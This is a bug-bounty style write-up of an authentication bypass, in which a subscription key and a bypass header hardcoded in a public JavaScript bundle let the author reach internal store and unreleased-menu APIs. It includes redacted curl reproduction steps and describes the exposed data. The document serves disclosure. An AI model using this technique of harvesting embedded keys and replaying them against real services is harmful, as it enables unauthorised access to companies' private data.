Write-UP

Critical Auth Bypass: Hardcoded Internal Headers in JS Bundle

During a deep dive into publicly accessible JavaScript bundles, I discovered a critical authentication bypass vulnerability affecting internal APIs. By abusing a hardcoded security header, I was able to bypass API Gateway filters and access sensitive internal operational data and unreleased product assets.

Impacted Data Details

1. Internal Restaurant Operational Data Access to details for 392 stores, including:

  • Internal Status: Identification of stores marked as DEAD or CLOSED.

  • Management Structure: Exposure of internal operational patch names and regional leadership details.

  • Real Estate Strategy: Access to internal property categories and site performance metrics.

2. Leaked 2025 Menu Innovation & Assets Unauthorized access to the future product roadmap:

  • Unreleased Products: Details on future marketing campaigns and upcoming meals.

  • Marketing Assets: Direct links to high-resolution CDN images for 2025 projects.

  • Recipe Information: Internal descriptions of menu items before public launch.

Steps to Reproduce

1. Extract Secrets

Locate the Ocp-Apim-Subscription-Key and x-xxxxx-bypass within the publicly accessible app.js file.

2. Retrieve Internal Restaurant Data

Using curl to query the internal service:

curl -X POST "https://xxxxx.com/restaurant/v3/restaurant" \
-H "Ocp-Apim-Subscription-Key: xxxxx" \
-H "x-xxxxx-bypass: xxxxx" \
-H "Content-Type: application/json" \
-d '{"latitude":40.7580, "longitude":-73.9855, "radius":80467, "pageSize":10}'

3. Retrieve 2025 Menu Data

Accessing the menu innovation endpoint:

curl -X GET "https://xxxxx.com/menuinnovation/v1/universalmeals/online" \
-H "Ocp-Apim-Subscription-Key: xxxxx" \
-H "x-xxxxx-bypass: xxxxx"

Impact

  • Strategic Business Risk: Exposure of upcoming product roadmaps and internal store performance metrics to competitors.

  • Social Engineering: Disclosure of internal managerial patch names enables targeted phishing attacks against regional leadership.

  • Financial Risk: Leak of high-value marketing assets and future recipes before official launch.

Note: This vulnerability has been reported and resolved. Always ensure you have permission before testing any target.

Leave a Reply